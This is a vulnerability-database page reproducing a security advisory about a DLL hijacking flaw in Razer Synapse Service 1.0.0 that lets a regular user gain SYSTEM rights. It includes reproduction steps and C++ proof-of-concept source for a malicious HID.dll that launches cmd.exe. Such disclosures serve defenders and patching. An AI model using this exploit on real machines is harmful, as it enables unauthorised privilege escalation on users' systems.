Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Razer Synapse Service 1.0.0 DLL Injection

🗓️ 18 Mar 2020 00:00:00Reported by Juan SaccoType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 138 Views

Razer Synapse Service v1.0.0 DLL Injection, privilege escalatio

Code
`Discovered by: Juan Sacco <[email protected]>  
Razer Synapse Service v1.0.0 is prone to a DLL Injection because it  
fails to properly filter user supplied input and loads a .DLL from  
%ProgramData% from userland with SYSTEM rights allowing to escalate  
the priveleges from a regular user to SYSTEM rights.  
  
Program: Raze Synapse Service  
Version: 1.0.0  
Vendor: https://www.razer.com/  
Download link: https://www.razer.com/downloads  
  
Steps To Reproduce:  
Move your .DLL to C:\ProgramData\Razer\Synapse3\Service\Bin\HID.dll  
Restart the PC or restart the service. The service runs with SYSTEM rights.  
Enjoy your privilege escalation!  
  
Supporting Material/References:  
ProgramData specifies the path to the program-data folder (normally  
C:\ProgramData). Unlike the Program Files folder, this folder can be  
used by applications to store data for standard users, because it does  
not require elevated permissions. Reference:  
https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-8.1-and-8/ff716245(v=win.10)?redirectedfrom=MSDN#feedback  
  
Razer Synaprse Service.exe loads a DLL ( HID.dll ) from  
ProgramData\Razer\Synapse3\Service\ folder with the function:  
"HidD_GetHidGuid()" using the following code we can compile a DLL and  
export this function from it to being called during attach.  
  
// dllmain.cpp : Defines the entry point for the DLL application.  
include "pch.h"  
include "windows.h"  
BOOL APIENTRY DllMain( HMODULE hModule,  
DWORD ul_reason_for_call,  
LPVOID lpReserved  
)  
{  
char cmd[] = "cmd.exe /c";  
switch (ul_reason_for_call)  
{  
case DLL_PROCESS_ATTACH:  
WinExec(cmd, SW_SHOWNORMAL);  
ExitProcess(0);  
case DLL_THREAD_ATTACH:  
WinExec(cmd, SW_SHOWNORMAL);  
ExitProcess(0);  
case DLL_THREAD_DETACH:  
WinExec(cmd, SW_SHOWNORMAL);  
ExitProcess(0);  
case DLL_PROCESS_DETACH:  
WinExec(cmd, SW_SHOWNORMAL);  
ExitProcess(0);  
break;  
}  
return TRUE;  
}  
  
extern "C" __declspec(dllexport) void HidD_GetHidGuid()  
{  
char cmd[] = "cmd.exe /c";  
WinExec(cmd, SW_SHOWNORMAL);  
}  
  
Impact  
A regular user could abuse of this vulnerability to gain full SYSTEM rights.  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
18 Mar 2020 00:00Current
0.3Low risk
Vulners AI Score0.3
razer synapse servicedll injectionprivilege escalationsystem rightsprogramdatauserlandvulnerability
138